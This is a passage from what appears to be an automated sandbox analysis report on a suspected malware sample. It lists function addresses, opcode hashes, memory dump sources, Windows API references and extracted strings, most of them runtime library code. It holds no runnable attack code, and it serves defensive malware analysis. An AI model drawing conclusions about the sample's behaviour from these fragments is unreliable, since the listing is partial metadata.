                                                          • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                          • Instruction Fuzzy Hash: 04E01A75A116849FD7018F25E994B007BA1E704B10F458066F800D7A79F3B86C80CF8E
                                                          Function 02F13BFF Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction ID: 78adb8d2ee4c973c8605762d631ca60d62160a1591ddb5a7f66d0a391d21d68e
                                                          • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction Fuzzy Hash: 4DC08C34400E808ACE39892082703B433A5A3817C6FC806CCCA0B8BA45C71E98C2EF00
                                                          Function 004269E4 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                          • Instruction ID: 2572daf3ac28ea9ece149f63ca22f641f49709f61c5ee85f622209572a58cfb2
                                                          • Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                          • Instruction Fuzzy Hash: 33D08C31365650AFCB41DB48DD42F00B3E0EB48B32F258282B830AB2F2C724FE41CA05
                                                          Function 0042F265 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                          • Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
                                                          • Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                          • Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10
                                                          Function 0045999F Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • type_info::operator==.LIBVCRUNTIME ref: 00459ABE
                                                          • CatchIt.LIBVCRUNTIME ref: 00459C1D
                                                          • _UnwindNestedFrames.LIBCMT ref: 00459D1E
                                                          • CallUnexpected.LIBVCRUNTIME ref: 00459D39
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm$x@F
                                                          • API String ID: 2332921423-3829711656
                                                          • Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                          • Instruction ID: 2a8b5e3cbe88d0ad45d83a49b6c8541956edddbcc5d33c7cd0fd48112d7d16c1
                                                          • Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                          • Instruction Fuzzy Hash: F9B16771800249EBCF19DFA5C8819AEB7B5FF04316F18415AEC116B213D338EE59CBA9
                                                          Function 0045C793 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0045C0FF), ref: 0045C7AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                          • Instruction ID: 82d02ba150d8eb4d5d6beeccfbe315dd90ac4e528bf330bfbd80dbdd17a07d9b
                                                          • Opcode Fuzzy Hash: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                          • Instruction Fuzzy Hash: 585170B0900B0ADFCF149F69D8C81AEBBB0FB45316F14414BD881A6256DB788959CF5E
                                                          Function 0045466D Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00454B19: CreateFileW.KERNEL32(00000000,00000000,?,00454716,?,?,00000000,?,00454716,00000000,0000000C), ref: 00454B36
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,755AF770), ref: 00454781
                                                          • __dosmaperr.LIBCMT ref: 00454788
                                                          • GetFileType.KERNEL32(00000000), ref: 00454794
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,755AF770), ref: 0045479E
                                                          • __dosmaperr.LIBCMT ref: 004547A7
                                                          • CloseHandle.KERNEL32(00000000), ref: 004547C7
                                                          • CloseHandle.KERNEL32(00455523), ref: 00454914
                                                          • GetLastError.KERNEL32 ref: 00454946
                                                          • __dosmaperr.LIBCMT ref: 0045494D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID:
                                                          • API String ID: 4237864984-0
                                                          • Opcode ID: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                          • Instruction ID: 038922a14cfed84d654bc7e4756cd55dec8d6f56b9250bad4a8b086e30f44e5e
                                                          • Opcode Fuzzy Hash: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                          • Instruction Fuzzy Hash: C4A13731A041449FCF189F68DC91BAE3BA0EB87329F14015EFC019F392DB78885AC75A
                                                          Function 004041F8 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 391COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %1.17g$[,]{: }$false$null$true
                                                          • API String ID: 4218353326-762322047
                                                          • Opcode ID: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                          • Instruction ID: 8a31c525fd10ccff58647d80abb421e7a2f49e00f52c285c36168c55111fec75
                                                          • Opcode Fuzzy Hash: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                          • Instruction Fuzzy Hash: E8B1E4F27043015BC701A9298C5062BA6DA9FD1318F19493FEF59E33C2FA7EDD16425A
                                                          Function 0043D770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D7A7
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D7AF
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D838
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0043D863
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D8B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                          • Instruction ID: f027fe2574540ca3b1f88e77f7abec4aa80c90a537e94c27518ff210aad43bfc
                                                          • Opcode Fuzzy Hash: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                          • Instruction Fuzzy Hash: 0041EA34D012089BCF14EF69D881A9F7BB5FF48318F14816BE8249B352D739EA15CB95
                                                          Function 0045299E Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                          • Instruction ID: 20f6fc253ed9e18728f1e3e0f73237be974277a9ced04a575444c598e2f27323
                                                          • Opcode Fuzzy Hash: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                          • Instruction Fuzzy Hash: 05B1F574A04285AFDB15CF99C980BBE7BB1BF86305F14415BE80067393C7B89D4ACB69
                                                          Function 0044C5A0 Relevance: 9.3, APIs: 6, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                          • __FindPESection.LIBCMT ref: 0044C6D1
                                                          • VirtualQuery.KERNEL32(83000000,381389CC,0000001C,381389CC,?,?,?), ref: 0044C7B6
                                                          • __FindPESection.LIBCMT ref: 0044C7F3
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                          • __FindPESection.LIBCMT ref: 0044C82D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                                          • String ID:
                                                          • API String ID: 2529200597-0
                                                          • Opcode ID: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                          • Instruction ID: e40285013e32dfb27aa5986082f3d9acaacd06ee7156ac865e10eba53592a1aa
                                                          • Opcode Fuzzy Hash: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                          • Instruction Fuzzy Hash: 71A1F375E022159BEB50CFA9D9C07BEB3A4EB49314F19412AD855E3361E739DC028FA8
                                                          Function 00432B1B Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00432EBD
                                                            • Part of subcall function 00430E6C: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                            • Part of subcall function 00432718: CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateCompatibleCreateHeapInfoParametersSystem
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 392924372-1067927601
                                                          • Opcode ID: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                          • Instruction ID: 62ef33d165420df4abe6194fc317c011647a9d43179361cb113ffb45af4e0bee
                                                          • Opcode Fuzzy Hash: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                          • Instruction Fuzzy Hash: 4AE12B71E006158BDF289E598D8657FB7B0AB0C314F24292BE511FA390D7BC9A418B8B
                                                          Function 0044C202 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0044C1F9,0043D4A6,0043CFF7), ref: 0044C210
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044C21E
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044C237
                                                          • SetLastError.KERNEL32(00000000,0044C1F9,0043D4A6,0043CFF7), ref: 0044C289
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                          • Instruction ID: c0e2f545b2bb83990020f58b3cafac4cb819fbf5ee5e5dfe57bf4abdb9a8f05a
                                                          • Opcode Fuzzy Hash: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                          • Instruction Fuzzy Hash: 5601F53260B6116EB69117B66CC656B2A88EF1137A328033FF920851F2FFD94C41919D
                                                          Function 02F23A37 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^F
                                                          • API String ID: 0-2072159057
                                                          • Opcode ID: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                          • Instruction ID: a60480e2b274fa6d29f994d5387f5aa4067702b02597ac675eb56d1694b146b1
                                                          • Opcode Fuzzy Hash: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                          • Instruction Fuzzy Hash: 7A413EB2A00754AFD724AF7CCC01B6ABBFAEB85750F10856AE201DB690D379D544CF80
                                                          Function 004468EB Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcsrchr
                                                          • String ID: .bat$.cmd$.com$.exe
                                                          • API String ID: 1752292252-4019086052
                                                          • Opcode ID: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                          • Instruction ID: b55bede8d45b761b400ac8ce0250aded4c8690036b953bdef2cda7eece1c3866
                                                          • Opcode Fuzzy Hash: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                          • Instruction Fuzzy Hash: A8010477A24A56213614156D9C0267797988B93BB6727402FFC44EB2C2EEECED02019E
                                                          Function 00443916 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,381389CC,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044394B
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044395D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044397F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                          • Instruction ID: 98d842734981b974643d07bc2e17aaafc6a7a08e37008b1518908caaa5ffc225
                                                          • Opcode Fuzzy Hash: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                          • Instruction Fuzzy Hash: DC01A771904655EBDB118F50CC05BAEB7B8FB44B51F000626E811A22D0EBF89A04CA99
                                                          Function 0044623D Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                          • Instruction ID: 8aab27407c0a82a01c0ac988981d35579ce087bbb9e55deaa5eb6bc71ee87661
                                                          • Opcode Fuzzy Hash: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                          • Instruction Fuzzy Hash: 6C51707990024DAAEF00EFE4D844AEEB7B8FF09710F11405BE815E7250EB74DA45CB6A
                                                          Function 00446CD2 Relevance: 7.6, APIs: 5, Instructions: 143pipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileType.KERNEL32(00446BF7,?,00000000,?), ref: 00446CF4
                                                          • GetFileInformationByHandle.KERNEL32(00446BF7,?), ref: 00446D4E
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00446BF7,?,000000FF,00000000), ref: 00446DDC
                                                          • __dosmaperr.LIBCMT ref: 00446DE3
                                                          • PeekNamedPipe.KERNEL32(00446BF7,00000000,00000000,00000000,?,00000000), ref: 00446E20
                                                            • Part of subcall function 00446999: __dosmaperr.LIBCMT ref: 004469CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                          • String ID:
                                                          • API String ID: 1206951868-0
                                                          • Opcode ID: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                          • Instruction ID: 7fef5dbdd5f1ebb30aa965719069ce331059867e0b66cf3bcb9aaaf835df89e4
                                                          • Opcode Fuzzy Hash: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                          • Instruction Fuzzy Hash: 584160B5A00704AFEB24DFA5DC459ABBBF9FF89304B11452EF846D3610E734A845CB16
                                                          Function 00403EAD Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 400COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %1.17g$,]{: }$null
                                                          • API String ID: 4218353326-1793514501
                                                          • Opcode ID: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                          • Instruction ID: dfdaef210c9fde1e563ad86d0075ca4844e5c450f328af3dc752b2d50a02e017
                                                          • Opcode Fuzzy Hash: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                          • Instruction Fuzzy Hash: 68B1DFE2B042005BD7006A669C5162B65D98FD1359F09453FEF4AF33C2FA3EDE19829B
                                                          Function 00459DC4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00459CCA,?,?,00000000,00000000,00000000,?), ref: 00459DE9
                                                          • CatchIt.LIBVCRUNTIME ref: 00459ECF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CatchEncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 1435073870-2084237596
                                                          • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                          • Instruction ID: 680bccfe0e0854ffc158b5e00edb6862103a1416f9df0b4f366e0dcb6488795f
                                                          • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                          • Instruction Fuzzy Hash: 34416871900209EFDF15DF98CD82AAEBBB5FF48305F18805AF904672A2D3399D54DB58
                                                          Function 00456D31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8), ref: 00456D3E
                                                          • GetLastError.KERNEL32(?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8,?,^D,0044C1B0), ref: 00456D48
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,^D,0044C1B0,0044C294,00000003,0044069B,?,?,?,?,00000000,0045FB2F,004058C6), ref: 00456D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID: api-ms-
                                                          • API String ID: 3177248105-2084034818
                                                          • Opcode ID: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                          • Instruction ID: 0ecaf6013e36b0431d801e3916b08b76fdb95d3f1c140b132a01747a849ad822
                                                          • Opcode Fuzzy Hash: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                          • Instruction Fuzzy Hash: 04E012303C4204B7DB101B61DC06B593A789B10B56F540431FD0DA51E1EBF5A858954E
                                                          Function 0045074A Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleOutputCP.KERNEL32(381389CC,00455523,00000000,?), ref: 004507AD
                                                            • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00450A08
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00450A50
                                                          • GetLastError.KERNEL32 ref: 00450AF3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                          • String ID:
                                                          • API String ID: 2112829910-0
                                                          • Opcode ID: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                          • Instruction ID: e52ebc46d8e9f13757024da4890b50ba647b118a1bf42f91cd2d0be3dbea7dc8
                                                          • Opcode Fuzzy Hash: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                          • Instruction Fuzzy Hash: A0D17BB9D00248AFDF15CFA8C8809EDBBB4FF09315F18816AE855E7352E734A946CB54
                                                          Function 004596C6 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          • Opcode ID: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                          • Instruction ID: 4fadf7dd59c53bd1b12e0029445d2e83e107cc747934abb9f5ec8e89f131d8d2
                                                          • Opcode Fuzzy Hash: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                          • Instruction Fuzzy Hash: 8C51F276A14202EFDB289F11D981BAA73A4EF18706F14452FEC0157292E73DEC49CB99
                                                          Function 004537D0 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                          • Instruction ID: a7f2c4688ec43d2a23ac8beb8ca83e3134fddb6ab0c13f52a90a8fe9f94a791d
                                                          • Opcode Fuzzy Hash: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                          • Instruction Fuzzy Hash: EE412AF2A00304AFD7249F79CC42B6AFBE8EB84756F10452FF551DB382D2B99A058784
                                                          Function 0044C89A Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualQuery.KERNEL32(83000000,381389CC,0000001C,381389CC,?,?,?), ref: 0044C7B6
                                                          • __FindPESection.LIBCMT ref: 0044C7F3
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                          • __FindPESection.LIBCMT ref: 0044C82D
                                                          Memory Dump Source
